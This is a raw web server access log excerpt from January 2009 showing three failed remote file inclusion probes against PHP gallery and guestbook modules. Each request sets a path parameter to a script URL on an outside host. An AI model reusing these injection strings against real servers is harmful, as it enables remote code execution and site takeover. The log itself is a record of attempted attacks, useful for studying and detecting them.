222.122.160.145 - - [06/Jan/2009:09:32:08 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:32:12 -0800] "GET /logs/access_080118.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:32:12 -0800] "GET /logs/access_071227.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
